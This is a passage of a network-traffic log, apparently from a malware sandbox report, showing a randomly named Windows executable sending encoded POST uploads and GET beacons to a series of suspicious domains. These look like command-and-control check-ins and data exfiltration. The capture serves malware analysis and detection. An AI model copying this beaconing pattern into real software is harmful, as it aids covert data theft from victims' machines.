                                                              Sep 12, 2024 15:06:28.382606030 CEST | 658 | IN | HTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:06:28 GMT
                                                              Server: Apache
                                                              Content-Length: 514
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              14 | 192.168.2.4 | 49756 | 203.161.43.228 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:30.358347893 CEST | 703 | OUT | POST /top4/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.lyxor.top
                                                              Origin: http://www.lyxor.top
                                                              Referer: http://www.lyxor.top/top4/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=0YfBXeJgZU4NK1+LYKrmknCalepIZvMgPEr1olAUI+MfDL7OGyA2gwNg1IeERI3fmuJqaBt815RjOiL4SiGLSf+98Hy1/BzYTQo+8DXSSUAAYGZHv9+loqtLUEt1pRKXwiM39tM3DUOemIpi5PXIjYOFANrJyvhz4Uvhgt1a5EHPDqLCFKXCGnBZdktIA3WIVj0XwxdAGxdWUBt0AUrJPss=
                                                              Sep 12, 2024 15:06:30.952228069 CEST | 658 | IN | HTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:06:30 GMT
                                                              Server: Apache
                                                              Content-Length: 514
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              15 | 192.168.2.4 | 49757 | 203.161.43.228 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:32.996753931 CEST | 10785 | OUT | POST /top4/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.lyxor.top
                                                              Origin: http://www.lyxor.top
                                                              Referer: http://www.lyxor.top/top4/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV= [TRUNCATED]
                                                              Sep 12, 2024 15:06:33.600950956 CEST | 658 | IN | HTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:06:33 GMT
                                                              Server: Apache
                                                              Content-Length: 514
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              16 | 192.168.2.4 | 49758 | 203.161.43.228 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:35.570231915 CEST | 428 | OUT | GET /top4/?3tV=5a3hUq11SmISK3qHdKia2mXgwLRkVM4pZnP+iXsVHcY4SpqJYUoammEh9pPyYI3IhaBpEAAW18wtS0XedlaJcs6ggHC5hAq1Qhwp4jbHazxRVHta3ZSkp7g=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.lyxor.top
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:06:36.196917057 CEST | 673 | IN | HTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:06:36 GMT
                                                              Server: Apache
                                                              Content-Length: 514
                                                              Connection: close
                                                              Content-Type: text/html; charset=utf-8
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              17 | 192.168.2.4 | 49759 | 3.33.130.190 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:41.497684002 CEST | 704 | OUT | POST /swnk/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.unveiled.digital
                                                              Origin: http://www.unveiled.digital
                                                              Referer: http://www.unveiled.digital/swnk/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=VKA/WpEHTWIP7TSZRccY4R5ewqqnRYNErDCSJcZfzMTlAKsaGm3GTmDT7FlsFj7fTu1bamYd1dGCBjVuXlQrfNS4Ek+ZIJyeGbiC8X7zrwqIfJdXssCiGlfGYYK8rLHhIv0kSJZVvr5+OJq+nZNYQOg5BNbt1EsFkSan/KFkt4y82AcTBX0n3Xhvc2NwqhGKgg==


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              18 | 192.168.2.4 | 49760 | 3.33.130.190 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:44.043433905 CEST | 724 | OUT | POST /swnk/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.unveiled.digital
                                                              Origin: http://www.unveiled.digital
                                                              Referer: http://www.unveiled.digital/swnk/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=VKA/WpEHTWIP9DiZT/0Yth5d8KqnEIMDrDGSJYIS0+nlFbcaBn3GeGDTwlljBj7QTu5pakcd1dCCBjluXWooddS6O0+hMJyeGbiC8TacrwyIe5tXuNChLFfBbYK8vLHlIv0aSLsdvpB+OIa+gMxfaOg/Ptasl0B1kwX72rVRkKfe+mNJQmVwlXFcBxEEni7D7rZMlmN452xMORO6uoR5deM=


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              19 | 192.168.2.4 | 49761 | 3.33.130.190 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:46.591907978 CEST | 10806 | OUT | POST /swnk/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.unveiled.digital
                                                              Origin: http://www.unveiled.digital
                                                              Referer: http://www.unveiled.digital/swnk/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV= [TRUNCATED]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              20 | 192.168.2.4 | 49762 | 3.33.130.190 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:49.136720896 CEST | 435 | OUT | GET /swnk/?3tV=YIofVfs+RVMTlTiIWsRg/2NG6LSwccZ17VOMMr8T7NjJGKpRQCPlXVPp8EduD1P6e8BrQW5t6vS2RBJAYjg4WvzfcnuaE4r1Crjp7jLNpS7ccpgL3d7XEEo=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.unveiled.digital
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:06:49.589215040 CEST | 398 | IN | HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Thu, 12 Sep 2024 13:06:49 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Connection: close
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3tV=YIofVfs+RVMTlTiIWsRg/2NG6LSwccZ17VOMMr8T7NjJGKpRQCPlXVPp8EduD1P6e8BrQW5t6vS2RBJAYjg4WvzfcnuaE4r1Crjp7jLNpS7ccpgL3d7XEEo=&IhkTb=xPfHG0o8kZI8"}</script></head></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              21 | 192.168.2.4 | 49763 | 185.199.108.153 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:54.656380892 CEST | 704 | OUT | POST /7ew2/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.cake11298.online
                                                              Origin: http://www.cake11298.online
                                                              Referer: http://www.cake11298.online/7ew2/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=FCnpklK+GPMKMa7kK2+vnt22hj/9YdR9F2kSR4OHJiCe8Q5mOyiBrjFLT0D0x9yuCAIKoP0CG/HFhtTCxoEncIVIXOqe4nm7F/RgOBikXLn6BvfGzul4D4aNEzAKPJ16goGLK7tJCpC1O/CJmefCqmehaVQavUJFiEzT0W0J+/b6pfU/1d1wQ1XZflC+SXYELQ==
                                                              Sep 12, 2024 15:06:55.290832043 CEST | 488 | IN | HTTP/1.1 405 Method Not Allowed
                                                              Connection: close
                                                              Content-Length: 131
                                                              Server: Varnish
                                                              Retry-After: 0
                                                              Accept-Ranges: bytes
                                                              Date: Thu, 12 Sep 2024 13:06:55 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-ewr-kewr1740066-EWR
                                                              X-Cache: MISS
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1726146415.053361,VS0,VE0
                                                              X-Fastly-Request-ID: 3456b0b95e875b7f7acc72f7c190dabc6ce956f7
                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              22 | 192.168.2.4 | 49764 | 185.199.108.153 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:57.204737902 CEST | 724 | OUT | POST /7ew2/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.cake11298.online
                                                              Origin: http://www.cake11298.online
                                                              Referer: http://www.cake11298.online/7ew2/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=FCnpklK+GPMKepzkIX+vhN21kj/9R9Q0F2oSR57YJXqe9yhmPziBnDFLBUDx+dzDCAV/oOICG/7FhoXCxb8oOoVKbuqQ2Hm7F/RgOBGaXLv6GevGhKJ7doaKFzAKZ50SgoGTK6wkCr61O+SJmL+UkmenU1RX/Vw7j1aE3F4O3u76l5FlksUnC1zqCiLKfUlNQX84AaPKLcm48LZUA3hbXG8=
                                                              Sep 12, 2024 15:06:57.637331963 CEST | 488 | IN | HTTP/1.1 405 Method Not Allowed
                                                              Connection: close
                                                              Content-Length: 131
                                                              Server: Varnish
                                                              Retry-After: 0
                                                              Accept-Ranges: bytes
                                                              Date: Thu, 12 Sep 2024 13:06:57 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-nyc-kteb1890078-NYC
                                                              X-Cache: MISS
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1726146418.591980,VS0,VE0
                                                              X-Fastly-Request-ID: 473839501002306211b20a7d1c7aff1d5782fcdd
                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              23 | 192.168.2.4 | 49765 | 185.199.108.153 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:06:59.751956940 CEST | 10806 | OUT | POST /7ew2/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.cake11298.online
                                                              Origin: http://www.cake11298.online
                                                              Referer: http://www.cake11298.online/7ew2/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:07:00.195352077 CEST | 488 | IN | HTTP/1.1 405 Method Not Allowed
                                                              Connection: close
                                                              Content-Length: 131
                                                              Server: Varnish
                                                              Retry-After: 0
                                                              Accept-Ranges: bytes
                                                              Date: Thu, 12 Sep 2024 13:07:00 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-ewr-kewr1740051-EWR
                                                              X-Cache: MISS
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1726146420.148075,VS0,VE1
                                                              X-Fastly-Request-ID: 56e8f6532db92e286954e50b99dfcbc3264bb94e
                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              24 | 192.168.2.4 | 49766 | 185.199.108.153 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:07:02.288429022 CEST | 435 | OUT | GET /7ew2/?IhkTb=xPfHG0o8kZI8&3tV=IAPJnQ6xP9g+To7sKnTlpdONgQ/IZpMKDV4JVaWfPzS1iBgaX2aSuicPSUKP+tbyByJ2nvQBfa7E+7/p3v0hf5xqKOi6z2fPcNVZO3WzTaW3LMTOzeMZHpQ= HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.cake11298.online
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:07:02.760704041 CEST | 804 | IN | HTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              Content-Length: 162
                                                              Server: GitHub.com
                                                              Content-Type: text/html
                                                              X-GitHub-Request-Id: 73BF:7FAD7:91171E7:9EA1E19:66E2E776
                                                              Accept-Ranges: bytes
                                                              Age: 0
                                                              Date: Thu, 12 Sep 2024 13:07:02 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-ewr-kewr1740053-EWR
                                                              X-Cache: MISS
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1726146423.701862,VS0,VE9
                                                              Vary: Accept-Encoding
                                                              X-Fastly-Request-ID: 87133c0211b80c48bed4e7672ef5169d6fa48201
                                                              Location: http://cake11298.online/7ew2/?IhkTb=xPfHG0o8kZI8&3tV=IAPJnQ6xP9g+To7sKnTlpdONgQ/IZpMKDV4JVaWfPzS1iBgaX2aSuicPSUKP+tbyByJ2nvQBfa7E+7/p3v0hf5xqKOi6z2fPcNVZO3WzTaW3LMTOzeMZHpQ=
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              25 | 192.168.2.4 | 49767 | 91.184.0.200 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:07:18.346549988 CEST | 713 | OUT | POST /c85h/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.jobworklanka.online
                                                              Origin: http://www.jobworklanka.online
                                                              Referer: http://www.jobworklanka.online/c85h/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=paxVmjqo+9dxxf660HFbzQua7suhnt/yCOzkgfM/I7NIVwTNgk4Rk7Qprvknh9o4ERzsguOFH7Veyl00VR6txFCSF1qTly6NgP9vl/lUN/QCuKA7fbOuzhpcz9HK31QHeONVrfK8k+tmjYXsbSArfiFNocgXFrqzNbX+v2txOa9f610e1x2/9v+LOibNP4+dIg==
                                                              Sep 12, 2024 15:07:18.982920885 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:07:18 GMT
                                                              Server: Apache
                                                              X-Xss-Protection: 1; mode=block
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              26 | 192.168.2.4 | 49768 | 91.184.0.200 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:07:20.965218067 CEST | 733 | OUT | POST /c85h/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.jobworklanka.online
                                                              Origin: http://www.jobworklanka.online
                                                              Referer: http://www.jobworklanka.online/c85h/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Ascii: 3tV=paxVmjqo+9dxgOq61gxbxwud3MuhsN/+COPkgeJ6IJpIUV/Nhl4Rl7QpjPkm8toJERPOguyFH7BeykE0VA6uwVCUJVqN7C6NgP9vl+BqN8gCu6w7e6OtsRpTw9HKz1QceOMlreGak7xmjZnsbAoqViFXl8hnBoe6DrmWpU1rCpl+yTlEkAXovva4TlS5C7DUTm4q2gQYPNGE2xhkoOkU4qE=
                                                              Sep 12, 2024 15:07:21.647376060 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:07:21 GMT
                                                              Server: Apache
                                                              X-Xss-Protection: 1; mode=block
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              27 | 192.168.2.4 | 49769 | 91.184.0.200 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:07:23.516911030 CEST | 10815 | OUT | POST /c85h/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.jobworklanka.online
                                                              Origin: http://www.jobworklanka.online
                                                              Referer: http://www.jobworklanka.online/c85h/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:07:24.253087044 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:07:24 GMT
                                                              Server: Apache
                                                              X-Xss-Protection: 1; mode=block
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              28 | 192.168.2.4 | 49770 | 91.184.0.200 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:07:26.061320066 CEST | 438 | OUT | GET /c85h/?IhkTb=xPfHG0o8kZI8&3tV=kYZ1lXq/hdZH/uis+T00xzejxPvlo8rfV8miq8Z/KrwXBz2m8C0A0d48n8FfouwDJQDRltn1A61Jy1UNPVSm21uxUE+/nj7G5dxHpoV9EucdjLBiC53j1jk= HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.jobworklanka.online
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:07:26.675591946 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:07:26 GMT
                                                              Server: Apache
                                                              X-Xss-Protection: 1; mode=block
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              29 | 192.168.2.4 | 49771 | 154.23.176.197 | 80 | 5084 | C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 12, 2024 15:07:31.903901100 CEST | 707 | OUT | POST /25kr/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.shipincheshi.skin
                                                              Origin: http://www.shipincheshi.skin
                                                              Referer: http://www.shipincheshi.skin/25kr/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:07:32.865859985 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:18:44 GMT
